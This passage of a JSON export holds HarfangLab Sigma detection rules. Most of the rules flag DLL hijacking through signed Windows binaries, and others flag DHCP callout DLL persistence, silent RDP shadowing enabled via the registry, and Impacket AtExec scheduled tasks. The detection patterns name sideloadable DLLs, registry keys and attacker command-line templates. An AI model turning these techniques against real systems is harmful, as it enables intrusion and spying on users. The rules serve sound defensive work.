filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e1a1a4d-470d-4a6b-a253-bc8772d2410b",
"rule_name": "DLL Hijacking via rdpsauachelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpsauachelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e1ebf81-bb2e-42dc-885c-9369dfefad84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081594Z",
"creation_date": "2026-03-23T11:45:34.081596Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmdiagnosticstool.yml",
"content": "title: DLL Hijacking via mdmdiagnosticstool.exe\nid: 9e1ebf81-bb2e-42dc-885c-9369dfefad84\ndescription: |\n Detects potential Windows DLL Hijacking via mdmdiagnosticstool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdmdiagnosticstool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmiso8601utils.dll'\n - '\\DynamoAPI.dll'\n - '\\iri.dll'\n - '\\MdmDiagnostics.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\tbs.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e1ebf81-bb2e-42dc-885c-9369dfefad84",
"rule_name": "DLL Hijacking via mdmdiagnosticstool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdmdiagnosticstool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e465662-94b6-4aa5-a6b8-523e0ed2f673",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078337Z",
"creation_date": "2026-03-23T11:45:34.078339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078344Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mrt.yml",
"content": "title: DLL Hijacking via mrt.exe\nid: 9e465662-94b6-4aa5-a6b8-523e0ed2f673\ndescription: |\n Detects potential Windows DLL Hijacking via mrt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mrt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e465662-94b6-4aa5-a6b8-523e0ed2f673",
"rule_name": "DLL Hijacking via mrt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mrt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095551Z",
"creation_date": "2026-03-23T11:45:34.095553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mschedexe.yml",
"content": "title: DLL Hijacking via mschedexe.exe\nid: 9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9\ndescription: |\n Detects potential Windows DLL Hijacking via mschedexe.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mschedexe.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\MaintenanceUI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9",
"rule_name": "DLL Hijacking via mschedexe.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mschedexe.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e9f7788-18a6-4b60-8051-1b9eb773f848",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072016Z",
"creation_date": "2026-03-23T11:45:34.072018Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072022Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html"
],
"name": "t1112_persistence_registry_dhcp_callout.yml",
"content": "title: DHCP Server Callout DLL Persistence Added\nid: 9e9f7788-18a6-4b60-8051-1b9eb773f848\ndescription: |\n Detects modifications to DHCP server configuration registry keys related to Callout DLL installation.\n This technique allows attackers to load malicious DLLs by abusing DHCP server's Callout DLL functionality, achieving code execution in the context of the DHCP service after service restart.\n It is recommended to investigate any DHCP server Callout DLL modifications, and to verify the legitimacy and signing of installed DLLs.\nreferences:\n - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\ndate: 2020/10/02\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\Parameters\\CalloutDlls'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\Parameters\\CalloutEnabled'\n exclusion:\n Details:\n - '(Empty)'\n - 'DWORD (0x00000000)'\n condition: selection and not exclusion\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e9f7788-18a6-4b60-8051-1b9eb773f848",
"rule_name": "DHCP Server Callout DLL Persistence Added",
"rule_description": "Detects modifications to DHCP server configuration registry keys related to Callout DLL installation.\nThis technique allows attackers to load malicious DLLs by abusing DHCP server's Callout DLL functionality, achieving code execution in the context of the DHCP service after service restart.\nIt is recommended to investigate any DHCP server Callout DLL modifications, and to verify the legitimacy and signing of installed DLLs.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9eb14058-3136-4f42-b295-b159ce63b711",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620230Z",
"creation_date": "2026-03-23T11:45:34.620232Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620236Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1112_rdp_shadowing_enabled.yml",
"content": "title: Silent RDP Shadowing Enabled via Registry\nid: 9eb14058-3136-4f42-b295-b159ce63b711\ndescription: |\n Detects a registry change effectively enabling the RDP Shadowing mechanism on the current machine.\n This can be used by attackers to spy on or hijack a user's RDP session, as a means of acquiring credentials or moving laterally through the network.\n The registry values indicate different levels of user control over being shadowed:\n 0 - No remote control allowed;\n 1 - Full Control with user's permission;\n 2 - Full Control without user's permission;\n 3 - View Session with user's permission;\n 4 - View Session without user's permission.\n This may be a legitimate action from a tech support team.\n It is recommended to analyze the process responsible for the registry modification to determine the legitimacy of this action.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow'\n Details|contains: '?WORD' # Non-zero values work with different effects\n\n filter_values:\n Details:\n - 'DWORD (0x00000000)' # Disabled or request user permissions\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000003)'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9eb14058-3136-4f42-b295-b159ce63b711",
"rule_name": "Silent RDP Shadowing Enabled via Registry",
"rule_description": "Detects a registry change effectively enabling the RDP Shadowing mechanism on the current machine.\nThis can be used by attackers to spy on or hijack a user's RDP session, as a means of acquiring credentials or moving laterally through the network.\nThe registry values indicate different levels of user control over being shadowed:\n0 - No remote control allowed;\n1 - Full Control with user's permission;\n2 - Full Control without user's permission;\n3 - View Session with user's permission;\n4 - View Session without user's permission.\nThis may be a legitimate action from a tech support team.\nIt is recommended to analyze the process responsible for the registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ec35ca1-e7b1-4bbc-a829-98e3e48067dc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624462Z",
"creation_date": "2026-03-23T11:45:34.624464Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/fortra/impacket/blob/master/examples/atexec.py",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_atexec_scheduled_task_created.yml",
"content": "title: AtExec Scheduled Task Created\nid: 9ec35ca1-e7b1-4bbc-a829-98e3e48067dc\ndescription: |\n Detects scheduled tasks created by AtExec, a tool from the Impacket suite used for remote command execution via scheduled tasks.\n AtExec creates distinctive scheduled tasks with specific characteristics including a hardcoded StartBoundary timestamp (2015-07-15T20:35:13.2757294) and command-lines that redirect output to temporary files in %windir%\\Temp\\.\n This technique is commonly used by attackers for lateral movement and remote code execution on Windows systems.\n It is recommended to investigate the source of the scheduled task creation, review the task content and command line for malicious activity, and check for related lateral movement indicators on both source and target systems.\nreferences:\n - https://github.com/fortra/impacket/blob/master/examples/atexec.py\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/07\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.lateral_movement\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection_operation:\n OperationType: 'create'\n\n selection_atexec:\n - FirstActionCommandLine: 'cmd.exe /C * > %windir%\\Temp\\\\????????.tmp 2>&1'\n - TaskContent|contains: '2015-07-15T20:35:13.2757294'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ec35ca1-e7b1-4bbc-a829-98e3e48067dc",
"rule_name": "AtExec Scheduled Task Created",
"rule_description": "Detects scheduled tasks created by AtExec, a tool from the Impacket suite used for remote command execution via scheduled tasks.\nAtExec creates distinctive scheduled tasks with specific characteristics including a hardcoded StartBoundary timestamp (2015-07-15T20:35:13.2757294) and command-lines that redirect output to temporary files in %windir%\\Temp\\.\nThis technique is commonly used by attackers for lateral movement and remote code execution on Windows systems.\nIt is recommended to investigate the source of the scheduled task creation, review the task content and command line for malicious activity, and check for related lateral movement indicators on both source and target systems.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ec5d550-39ee-4097-b20d-5f4d170024f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092665Z",
"creation_date": "2026-03-23T11:45:34.092667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spectrum.yml",
"content": "title: DLL Hijacking via spectrum.exe\nid: 9ec5d550-39ee-4097-b20d-5f4d170024f2\ndescription: |\n Detects potential Windows DLL Hijacking via spectrum.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spectrum.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SpectrumSyncClient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ec5d550-39ee-4097-b20d-5f4d170024f2",
"rule_name": "DLL Hijacking via spectrum.exe",
"rule_description": "Detects potential Windows DLL Hijacking via spectrum.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9eef92d3-30f8-41cf-aef3-2097a98e42ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617301Z",
"creation_date": "2026-03-23T11:45:34.617304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617308Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/"
],
"name": "t1543_001_launch_agents_modified.yml",
